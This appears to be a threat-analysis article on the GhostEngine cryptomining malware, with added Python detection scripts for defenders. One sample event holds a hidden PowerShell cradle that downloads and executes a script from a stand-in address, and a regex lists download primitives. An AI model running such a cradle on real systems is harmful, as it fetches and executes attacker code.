The GhostEngine Malware Attempts to Use Your Computer for Cryptomining
GhostEngine is the primary payload of a sophisticated intrusion set that chains several malicious modules and abuses vulnerable drivers to disable security tooling before it deploys a cryptominer. Researchers track the intrusion set as REF4578 and its main payload as GHOSTENGINE; parts of the same activity have also been reported under the name HIDDENSHOVEL.
Key Features and Tactics
Contingency and Duplication Mechanisms
The GhostEngine authors built in numerous contingency and duplication mechanisms (fallback download channels, backup infrastructure, repeated cleanup and re-installation steps) to ensure resilience and persistence. These mechanisms keep the malware functional even when parts of the operation are disrupted, for example when a domain is taken down or one stage is removed.
Disabling Security Solutions
GHOSTENGINE loads known-vulnerable, legitimately signed drivers (a bring-your-own-vulnerable-driver, or BYOVD, technique) to terminate and delete known Endpoint Detection and Response (EDR) agents from kernel context. Because the miner itself is easy for security products to spot, this step is what allows the coin miner to be deployed and kept running without interference. Loading a driver requires administrative privileges, so the chain assumes it is already running elevated; an unexpected driver load or an EDR service stopping without an administrator action is a strong signal that this stage is under way.
This campaign exhibits an uncommon level of complexity to ensure the installation and persistence of the XMRIG miner. It begins with the execution of a PE file named Tiworker.exe, which masquerades as the legitimate Windows TiWorker.exe (the Windows Modules Installer worker, which normally runs from the WinSxS component store). A TiWorker.exe running from any other directory is worth investigating. Executing this file triggers the rest of the malicious sequence.
Infection and Execution Process
Upon execution, Tiworker.exe runs a hardcoded PowerShell command that retrieves an obfuscated script, get.png, from the attacker's command and control (C2) server. That script orchestrates the entire intrusion flow, downloading the additional tools, modules and configuration that the later stages need. The .png extension is a disguise: the file is a PowerShell script, not an image.
GHOSTENGINE is the component responsible for retrieving and executing the remaining modules on the infected machine. It primarily downloads files over HTTP from a configured domain, falling back to a backup IP address when the domains are unavailable. FTP, using embedded credentials, serves as a secondary protocol for added redundancy, so blocking a single domain or protocol does not stop the download stage.
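To turn the chain above into detection logic, here is an added Python example (not code from the original page or from the researchers it cites) that runs three checks over constructed process-creation events: a TiWorker.exe image outside the WinSxS component store, PowerShell spawned by a process named Tiworker.exe, and a PowerShell download primitive fetching a URL whose path ends in an image extension. The event layout, the sample command line and the 203.0.113.10 address are constructed for the example; the WinSxS location rule is an assumption about where the legitimate binary lives.

```python
from __future__ import annotations

import re
from pathlib import PureWindowsPath

# Assumption: the legitimate TiWorker.exe (Windows Modules Installer worker)
# runs from the WinSxS component store, so any other location is suspicious.
LEGIT_TIWORKER_ROOT = "c:\\windows\\winsxs\\"

# PowerShell download primitives commonly used as download cradles.
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|invoke-restmethod|\birm\b)",
    re.IGNORECASE,
)
# A URL whose path ends in an image extension: the stager fetches scripts
# named like images (get.png, clearn.png).
IMAGE_URL_RE = re.compile(r"https?://\S+?\.(png|jpg|gif|bmp)\b", re.IGNORECASE)


def _name(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return PureWindowsPath(path).name.lower()


def analyze_event(ev: dict) -> list[str]:
    """Return the names of the rules an event matches (empty list = clean)."""
    hits: list[str] = []
    image, parent, cmd = ev["image"], ev["parent"], ev["cmdline"]

    # Rule 1: a binary named TiWorker.exe that is not in the WinSxS store.
    if _name(image) == "tiworker.exe" and not image.lower().startswith(LEGIT_TIWORKER_ROOT):
        hits.append("tiworker_masquerade")

    if _name(image) in ("powershell.exe", "pwsh.exe"):
        # Rule 2: PowerShell whose parent process is named Tiworker.exe.
        if _name(parent) == "tiworker.exe":
            hits.append("powershell_from_tiworker")
        # Rule 3: a download cradle fetching a script disguised as an image.
        if CRADLE_RE.search(cmd) and IMAGE_URL_RE.search(cmd):
            hits.append("image_named_script_cradle")
    return hits


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> matched rules, for every event that matches something."""
    findings: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        hits = analyze_event(ev)
        if hits:
            findings[i] = hits
    return findings


# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {   # legitimate servicing worker started by svchost from WinSxS
        "image": r"C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_10.0.19041.1_none_0\TiWorker.exe",
        "parent": r"C:\Windows\System32\svchost.exe",
        "cmdline": "TiWorker.exe -Embedding",
    },
    {   # look-alike dropped in a user directory
        "image": r"C:\Users\victim\Downloads\Tiworker.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": "Tiworker.exe",
    },
    {   # the hardcoded stager command (constructed shape, constructed address)
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Users\victim\Downloads\Tiworker.exe",
        "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                   ".DownloadString('http://203.0.113.10/get.png')\"",
    },
    {   # benign interactive PowerShell
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": "powershell Get-Process",
    },
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], rules)
```

The rules are deliberately independent: the path check catches the dropper even if it never spawns PowerShell, and the cradle check catches the stager even when the parent has already exited or been renamed. On a real host the `image`, `parent` and `cmdline` fields map directly onto Sysmon Event ID 1 (Image, ParentImage, CommandLine) or Security event 4688 with command-line auditing enabled.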
System Cleanup and Persistence
The script next downloads and executes clearn.png, a component designed to remove remnants of prior infections so that the new deployment does not collide with an older one. It deletes malicious files from C:\Program Files\Common Files\System\ado and from C:\PROGRA~1\COMMON~1\System\ado (the same directory written in 8.3 short-name form). Additionally, it removes scheduled tasks named:
- Microsoft Assist Job
- System Help Center Job
- SystemFlushDns
- SystemFlashDnsSrv
Artifacts of these scheduled tasks, or of the directories above, may indicate a previous infection, so they are worth hunting for even on hosts where no miner is currently running.
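As an added example of hunting for those artifacts (not code from the original page or from the researchers it cites), the Python below checks scheduled-task names parsed from `schtasks /query /fo CSV` output and directory paths against the task names and staging directories listed above. Both the long form and the 8.3 short-name form of the directory are included, since a live host may report either. The CSV text and the directory list are constructed sample data, not output from a real machine.

```python
from __future__ import annotations

import csv
import io
from pathlib import PureWindowsPath

# Scheduled task names the cleanup stage removes (from the article), lower-cased.
IOC_TASK_NAMES = {
    "microsoft assist job",
    "system help center job",
    "systemflushdns",
    "systemflashdnssrv",
}

# Staging directory in both its long and its 8.3 short-name spelling.
IOC_DIRS = {
    r"c:\program files\common files\system\ado",
    r"c:\progra~1\common~1\system\ado",
}


def suspicious_tasks(schtasks_csv: str) -> list[str]:
    """Parse `schtasks /query /fo CSV` output and return the IOC task paths found."""
    reader = csv.DictReader(io.StringIO(schtasks_csv))
    found: list[str] = []
    for row in reader:
        raw = row.get("TaskName", "")
        # schtasks prints the task path (e.g. "\Microsoft Assist Job"); compare the leaf name.
        leaf = raw.rsplit("\\", 1)[-1].strip().lower()
        if leaf in IOC_TASK_NAMES:
            found.append(raw)
    return found


def suspicious_dirs(existing_dirs: list[str]) -> list[str]:
    """Return the entries of existing_dirs that match a staging-directory IOC."""
    found: list[str] = []
    for d in existing_dirs:
        # PureWindowsPath normalises separators and drops a trailing backslash.
        norm = str(PureWindowsPath(d)).lower().rstrip("\\")
        if norm in IOC_DIRS:
            found.append(d)
    return found


# Constructed sample `schtasks /query /fo CSV` output (not from a real host).
SAMPLE_SCHTASKS = (
    '"TaskName","Next Run Time","Status"\n'
    '"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","N/A","Ready"\n'
    '"\\Microsoft Assist Job","5/22/2024 3:00:00 AM","Ready"\n'
    '"\\SystemFlashDnsSrv","N/A","Running"\n'
    '"\\Microsoft\\Windows\\Time Synchronization\\SynchronizeTime","N/A","Ready"\n'
)

# Constructed list of directories found on a host.
SAMPLE_DIRS = [
    "C:\\Program Files\\Common Files\\System\\ado",
    "C:\\Program Files\\Common Files\\System\\Ole DB",
    "C:\\PROGRA~1\\COMMON~1\\System\\ado\\",
]

if __name__ == "__main__":
    print("tasks:", suspicious_tasks(SAMPLE_SCHTASKS))
    print("dirs: ", suspicious_dirs(SAMPLE_DIRS))
```

On a real Windows host, feed `suspicious_tasks` the captured output of `schtasks /query /fo CSV` and `suspicious_dirs` the directories enumerated under `C:\Program Files\Common Files\System`. Matching the leaf name rather than the full task path also catches a task that was registered under a subfolder, and comparing against both spellings of the directory avoids missing the 8.3 form that the cleanup component itself uses.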
Importance of Removing GhostEngine Malware
Removing GhostEngine is essential to stop your system from being used for cryptomining. Unauthorized mining drives CPU and GPU usage up, which slows the computer noticeably and raises energy consumption and costs. Because the intrusion set disables EDR agents before installing the miner, removal should include verifying that security software is running again and was not simply stopped or deleted.
Protecting Your Information
The intrusion set can download and run arbitrary additional modules from its C2 infrastructure, so an infected host is not limited to mining. Removing it closes that channel and helps keep your personal and professional data from being exposed to the operators.